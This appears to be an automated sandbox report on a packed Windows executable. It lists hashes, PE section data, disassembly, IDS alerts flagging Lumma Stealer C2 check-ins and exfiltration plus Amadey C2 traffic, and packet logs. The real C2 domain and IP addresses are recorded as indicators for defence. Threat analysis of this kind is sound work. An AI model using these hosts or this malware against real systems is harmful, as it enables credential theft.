SHA256:	a28bd583dab27c6e95c9f14ae64bd0b6831cc9226737f68b1a8bf9dd033843fa
SHA512:	0bc645d8e32ff722890e864d8f6ed8c4ab61372dc437ea146f9e920b8fecccfc4a3102e3773aaa3e5ab2a767b6f392ff0a8f2098e44a210db5cf19be5b16e18b
SSDEEP:	24576:wm34NGu4QOrYpj44bPupQKfXOzihBGxPJwFsYW/VY4TO7j013wx/AZM4tdMilBEh:Zruq0G4ja+KB3eYmF0AZRz
TLSH:	538533543C70301CDD9BEFB695BB8AEEAB1829148C924B776FA0C02374971D3D49C75A
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L... .pg..............................I...........@...........................J......s....@.................................Y@..m..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x89d000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67701720 [Sat Dec 28 15:20:00 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F36B8B629EAh
punpcklbw mm3, qword ptr [eax+eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F36B8B649E5h
add byte ptr [edi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax*4], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebx+05h], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add cl, byte ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or al, 80h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x54059	0x6d	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x53000	0x2b0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x541f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x52000	0x26000	e0e4cc0bc509ec0ecb5b0a5f82be1a4e	False	0.9999229029605263	data	7.983145979605079	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x53000	0x2b0	0x400	fe67bb2a9df3150b9c94de8bd81ed8a0	False	0.3603515625	data	5.186832724894366	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x54000	0x1000	0x200	39a711a7d804ccbc2a14eea65cf3c27e	False	0.154296875	data	1.0789976601211375	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x55000	0x2a8000	0x200	841a807ecf1416c63fa6b9d6f0256426	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ffxetdru	0x2fd000	0x19f000	0x19e400	5ab840d1a3503d0bb88244f08cfeb13a	False	0.994471253583283	data	7.953108190155835	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
yccyqbqs	0x49c000	0x1000	0x400	500223967f5a86ee5d67e05d3f638f23	False	0.7607421875	data	5.925554061500847	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x49d000	0x3000	0x2200	328cfe172b611a482f109292b278604b	False	0.0546875	DOS executable (COM)	0.5884367883571402	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x53058	0x256	ASCII text, with CRLF line terminators			0.5100334448160535

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-31T09:48:27.818762+0100	2058656	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop)	1	192.168.2.6	49371	1.1.1.1	53	UDP
2024-12-31T09:48:28.302124+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.6	49712	104.21.112.1	443	TCP
2024-12-31T09:48:28.302124+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49712	104.21.112.1	443	TCP
2024-12-31T09:48:29.154933+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49712	104.21.112.1	443	TCP
2024-12-31T09:48:29.154933+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49712	104.21.112.1	443	TCP
2024-12-31T09:48:29.641749+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.6	49713	104.21.112.1	443	TCP
2024-12-31T09:48:29.641749+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49713	104.21.112.1	443	TCP
2024-12-31T09:48:30.138929+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	49713	104.21.112.1	443	TCP
2024-12-31T09:48:30.138929+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49713	104.21.112.1	443	TCP
2024-12-31T09:48:30.870750+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.6	49715	104.21.112.1	443	TCP
2024-12-31T09:48:30.870750+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49715	104.21.112.1	443	TCP
2024-12-31T09:48:32.626850+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.6	49716	104.21.112.1	443	TCP
2024-12-31T09:48:32.626850+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49716	104.21.112.1	443	TCP
2024-12-31T09:48:33.719521+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.6	49717	104.21.112.1	443	TCP
2024-12-31T09:48:33.719521+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49717	104.21.112.1	443	TCP
2024-12-31T09:48:34.975857+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.6	49718	104.21.112.1	443	TCP
2024-12-31T09:48:34.975857+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49718	104.21.112.1	443	TCP
2024-12-31T09:48:35.412465+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	49718	104.21.112.1	443	TCP
2024-12-31T09:48:36.512535+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.6	49725	104.21.112.1	443	TCP
2024-12-31T09:48:36.512535+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49725	104.21.112.1	443	TCP
2024-12-31T09:48:38.587255+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.6	49742	104.21.112.1	443	TCP
2024-12-31T09:48:38.587255+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49742	104.21.112.1	443	TCP
2024-12-31T09:48:39.122566+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49742	104.21.112.1	443	TCP
2024-12-31T09:49:10.169424+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.6	49946	185.215.113.43	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 09:48:27.837459087 CET	49712	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:27.837500095 CET	443	49712	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:27.837677956 CET	49712	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:27.841212034 CET	49712	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:27.841228962 CET	443	49712	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:28.301888943 CET	443	49712	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:28.302124023 CET	49712	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:28.371898890 CET	49712	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:28.371933937 CET	443	49712	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:28.372334957 CET	443	49712	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:28.428194046 CET	49712	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:28.721422911 CET	49712	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:28.721422911 CET	49712	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:28.721587896 CET	443	49712	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:29.154946089 CET	443	49712	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:29.155034065 CET	443	49712	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:29.155220032 CET	49712	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:29.156768084 CET	49712	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:29.156788111 CET	443	49712	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:29.156810045 CET	49712	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:29.156816959 CET	443	49712	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:29.166183949 CET	49713	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:29.166244984 CET	443	49713	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:29.166332006 CET	49713	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:29.166748047 CET	49713	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:29.166759968 CET	443	49713	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:29.641583920 CET	443	49713	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:29.641748905 CET	49713	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:29.643044949 CET	49713	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:29.643060923 CET	443	49713	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:29.643363953 CET	443	49713	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:29.644553900 CET	49713	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:29.644578934 CET	49713	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:29.644634008 CET	443	49713	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:30.138928890 CET	443	49713	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:30.138998032 CET	443	49713	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:30.139031887 CET	443	49713	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:30.139045954 CET	49713	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:30.139074087 CET	443	49713	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:30.139113903 CET	49713	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:30.139117956 CET	443	49713	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:30.139132023 CET	443	49713	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:30.139173031 CET	49713	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:30.139175892 CET	443	49713	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:30.139184952 CET	443	49713	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:30.139216900 CET	49713	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:30.139225960 CET	443	49713	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:30.139894009 CET	443	49713	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:30.139955997 CET	49713	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:30.139969110 CET	443	49713	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:30.143671989 CET	443	49713	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:30.143739939 CET	49713	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:30.143757105 CET	443	49713	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:30.193670988 CET	49713	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:30.227646112 CET	443	49713	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:30.227709055 CET	443	49713	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:30.227735043 CET	443	49713	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:30.227823973 CET	443	49713	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:30.227895975 CET	49713	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:30.227895975 CET	49713	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:30.228107929 CET	49713	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:30.228154898 CET	443	49713	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:30.228183985 CET	49713	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:30.228199005 CET	443	49713	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:30.379390001 CET	49715	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:30.379465103 CET	443	49715	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:30.379569054 CET	49715	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:30.379877090 CET	49715	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:30.379895926 CET	443	49715	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:30.870654106 CET	443	49715	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:30.870749950 CET	49715	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:30.872421026 CET	49715	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:30.872453928 CET	443	49715	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:30.872744083 CET	443	49715	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:30.874028921 CET	49715	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:30.874181986 CET	49715	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:30.874219894 CET	443	49715	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:32.055941105 CET	443	49715	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:32.056045055 CET	443	49715	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:32.056107044 CET	49715	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:32.056237936 CET	49715	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:32.056263924 CET	443	49715	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:32.161369085 CET	49716	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:32.161421061 CET	443	49716	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:32.161501884 CET	49716	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:32.161813021 CET	49716	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:32.161825895 CET	443	49716	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:32.626720905 CET	443	49716	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:32.626849890 CET	49716	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:32.628168106 CET	49716	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:32.628179073 CET	443	49716	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:32.628421068 CET	443	49716	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:32.629798889 CET	49716	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:32.629950047 CET	49716	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:32.629981041 CET	443	49716	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:32.630028009 CET	49716	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:32.675333023 CET	443	49716	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:32.993990898 CET	443	49716	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:32.994112015 CET	443	49716	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:32.994175911 CET	49716	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:32.994283915 CET	49716	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:32.994307995 CET	443	49716	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:33.227415085 CET	49717	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:33.227457047 CET	443	49717	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:33.227543116 CET	49717	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:33.227842093 CET	49717	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:33.227861881 CET	443	49717	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:33.719443083 CET	443	49717	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:33.719521046 CET	49717	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:33.720846891 CET	49717	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:33.720855951 CET	443	49717	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:33.721122980 CET	443	49717	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:33.722683907 CET	49717	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:33.722879887 CET	49717	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:33.722904921 CET	443	49717	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:33.722965956 CET	49717	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:33.722970963 CET	443	49717	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:34.250823975 CET	443	49717	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:34.250916958 CET	443	49717	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:34.250968933 CET	49717	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:34.251112938 CET	49717	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:34.251130104 CET	443	49717	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:34.521821976 CET	49718	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:34.521877050 CET	443	49718	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:34.521948099 CET	49718	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:34.522239923 CET	49718	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:34.522252083 CET	443	49718	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:34.975758076 CET	443	49718	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:34.975857019 CET	49718	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:34.977322102 CET	49718	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:34.977338076 CET	443	49718	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:34.977571964 CET	443	49718	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:34.978952885 CET	49718	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:34.979062080 CET	49718	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:34.979067087 CET	443	49718	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:35.412486076 CET	443	49718	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:35.412581921 CET	443	49718	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:35.412658930 CET	49718	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:35.412897110 CET	49718	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:35.412919044 CET	443	49718	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:36.038533926 CET	49725	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:36.038583040 CET	443	49725	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:36.038640022 CET	49725	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:36.038997889 CET	49725	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:36.039010048 CET	443	49725	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:36.512451887 CET	443	49725	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:36.512535095 CET	49725	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:36.513832092 CET	49725	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:36.513840914 CET	443	49725	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:36.514096022 CET	443	49725	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:36.538264990 CET	49725	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:36.539133072 CET	49725	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:36.539158106 CET	443	49725	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:36.539248943 CET	49725	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:36.539264917 CET	443	49725	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:36.539365053 CET	49725	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:36.539411068 CET	443	49725	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:36.539480925 CET	49725	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:36.539496899 CET	443	49725	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:36.539505959 CET	49725	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:36.539518118 CET	443	49725	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:36.539613962 CET	49725	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:36.539628029 CET	443	49725	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:36.539752007 CET	49725	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:36.539771080 CET	443	49725	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:36.539782047 CET	49725	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:36.539885044 CET	49725	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:36.539906979 CET	49725	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:36.549087048 CET	443	49725	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:36.549182892 CET	49725	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:36.549201012 CET	443	49725	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:36.549235106 CET	49725	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:36.549258947 CET	49725	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:36.549264908 CET	443	49725	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:36.549308062 CET	49725	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:36.549412012 CET	49725	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:36.549438953 CET	49725	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:36.553890944 CET	443	49725	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:36.553936005 CET	49725	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:36.553955078 CET	443	49725	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:38.080528021 CET	443	49725	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:38.080625057 CET	443	49725	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:38.080698013 CET	49725	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:38.080854893 CET	49725	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:38.080877066 CET	443	49725	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:38.112272978 CET	49742	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:38.112287045 CET	443	49742	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:38.112351894 CET	49742	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:38.112616062 CET	49742	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:38.112627029 CET	443	49742	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:38.587152004 CET	443	49742	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:38.587255001 CET	49742	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:38.588534117 CET	49742	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:38.588550091 CET	443	49742	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:38.588794947 CET	443	49742	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:38.590081930 CET	49742	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:38.590106964 CET	49742	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:38.590146065 CET	443	49742	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:39.122576952 CET	443	49742	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:39.122689009 CET	443	49742	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:39.122767925 CET	49742	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:39.123016119 CET	49742	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:39.123023033 CET	443	49742	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:39.123038054 CET	49742	443	192.168.2.6	104.21.112.1
Dec 31, 2024 09:48:39.123044968 CET	443	49742	104.21.112.1	192.168.2.6
Dec 31, 2024 09:48:39.125334024 CET	49748	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:39.130168915 CET	80	49748	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:39.130239010 CET	49748	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:39.130386114 CET	49748	80	192.168.2.6	185.215.113.16
